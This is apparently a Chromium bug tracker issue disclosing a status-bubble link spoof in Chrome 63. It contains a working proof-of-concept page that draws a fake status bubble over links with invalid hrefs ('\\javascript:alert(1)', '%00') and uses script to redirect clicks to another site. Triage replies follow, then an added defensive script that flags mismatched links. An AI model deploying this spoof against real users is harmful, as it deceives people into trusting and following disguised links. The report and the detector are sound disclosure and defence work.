Issue 875302

Starred by 1 user

Issue metadata

Status: Available
Owner: ----
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Windows , Chrome , Mac
Pri: 2
Type: Bug



Link Alert (Status Bubble) Spoof

Reported by adri...@brztec.com, Aug 17

Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Steps to reproduce the problem:
Hi team. I found a way to spoof the destination of a link in the bottom page notification.

1. Open the attached poc.
2. Mouse over the links and you see https://www.google.com at the bottom of the page, apparently showing that these are the correct links.
3. Click on any link and a new tab will be opened with https://www.marvel.com.

*** PoC Code ***
<style>
  div {
    display: none;
  }
  div:hover {
    display: block;
  }

  /* Page element styled to resemble the browser's status bubble */
  div#fakelocation {
    display: none;
    height: 18px;
    width: 30%;
    overflow: visible;
    background-color: rgb(242,242,242);
    bottom: 0;
    position: fixed;
    left: 0;
    padding-top: 3px;
    padding-left: 2px;
    color: #868383;
    font-size: 13;
    border: 1px solid #e2e2e2;
    border-top-right-radius: 5px;
    border-bottom: 0px;
    font-family: Calibri, Candara, Segoe, "Segoe UI", Optima, Arial, sans-serif !important;
    font: small arial,sans-serif;
  }
</style>

<div id="fakelocation">https://www.google.com</div>
<br>
<a id="link1" name="link1" href="\\javascript:alert(1)" onclick="mouseClick()" onmouseover="mouseIn()" onmouseout="mouseOut()" target="_blank">www.google.com</a>
<br>
<a id="link4" name="link4" href="%00" onclick="mouseClick()" onmouseover="mouseIn()" onmouseout="mouseOut()" target="_blank">www.google.com</a>

<script>
// Show or hide the fake bubble while the pointer is over a link
function mouseIn() { document.getElementById("fakelocation").style.display = "inline"; }
function mouseOut() { document.getElementById("fakelocation").style.display = "none"; }

// The destination is set here by script, not by the href attribute
function mouseClick() {
  var fakeOpenDestino = window.open("\\javascript:alert(1)", "link1");
  fakeOpenDestino.document.write('<script>document.location.href="https://www.marvel.com";</' + 'script>');
  //setTimeout(function(){ fakeOpenDestino.close(); }, 50);
}
</script>

What is the expected behavior?
Chrome should always show at the bottom of the page the value of the href attribute of a link (TAG A), even if invalid.

What went wrong?
Chrome doesn't show the alert of a link's destination at the bottom of the page when it is invalid, allowing bad guys to spoof this alert, tricking users into clicking on a trusted link that isn't.

Did this work before? N/A 

Chrome version: 63.0.3239.132  Channel: n/a
OS Version: 10.0
Flash Version:
 
poc.JPG (131 KB)
results.JPG (136 KB)
poc_linkcheck_spoof.html (1.4 KB)
Chrome pop-up settings.
Google_Chrome_Pop-up_config.JPG (46.7 KB)
Components: UI>Browser>StatusBubble
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam OS-Chrome OS-Linux OS-Mac Type-Bug
Status: Available (was: Unconfirmed)
Summary: Link Alert (Status Bubble) Spoof (was: Link Alert Spoof)
Thanks for the report. As per https://www.chromium.org/user-experience/status-bubble, we do not consider the status bubble a security surface, so this is not considered a security bug.

However, I'm not sure if this is actually WAI, so I'll assign the StatusBubble component so this can be triaged from that perspective.
Ok. But when a tag attribute has an invalid href value, should the status bubble be shown?

Examples:
href="\\javascript:alert(1)"
href="%00" 
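
Added example, not part of the issue thread and not Chromium code: a reviewer-side check that flags anchors whose visible text names a host the href does not lead to, run over the two href values from the report. It assumes Node's WHATWG `URL` parser (whose idea of validity may differ from the browser's); the link objects, the `hasClickHandler` field and the base URL are constructed for illustration.

```javascript
// Pull a hostname out of link text such as "www.google.com" or "https://www.google.com/x".
function hostFromText(text) {
  const m = /^(?:https?:\/\/)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?:[\/:?#]|$)/i.exec(text.trim());
  return m ? m[1].toLowerCase() : null;
}

// Resolve href as a page at baseUrl would. null means the parser rejects it,
// so there is no destination a hover preview could display.
function resolveHref(href, baseUrl) {
  try {
    return new URL(href, baseUrl);
  } catch {
    return null;
  }
}

// Return the list of findings for one anchor ({ text, href, hasClickHandler }).
function auditLink(link, baseUrl) {
  const findings = [];
  const claimed = hostFromText(link.text);
  const target = resolveHref(link.href, baseUrl);
  if (target === null) {
    findings.push("href-unparseable");
  } else if (!/^https?:$/.test(target.protocol)) {
    findings.push("href-not-http");
  } else if (claimed && target.hostname !== claimed) {
    findings.push("text-host-mismatch");
  }
  // A click handler on an already suspicious link means script decides the destination.
  if (findings.length > 0 && link.hasClickHandler) {
    findings.push("script-controls-navigation");
  }
  return findings;
}

const BASE = "https://poc.example/poc_linkcheck_spoof.html"; // assumed hosting URL
// Constructed sample modelled on the PoC's two anchors, plus one honest link.
const SAMPLE_LINKS = [
  { text: "www.google.com", href: "\\\\javascript:alert(1)", hasClickHandler: true },
  { text: "www.google.com", href: "%00", hasClickHandler: true },
  { text: "www.google.com", href: "https://www.google.com/", hasClickHandler: false },
];

function auditAll(links = SAMPLE_LINKS, baseUrl = BASE) {
  return links.map((l) => ({ href: l.href, findings: auditLink(l, baseUrl) }));
}

console.log(JSON.stringify(auditAll(), null, 2));
```

Under this parser `\\javascript:alert(1)` is rejected outright, while `%00` resolves to a path on the hosting page's own origin and is caught by the host comparison instead.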
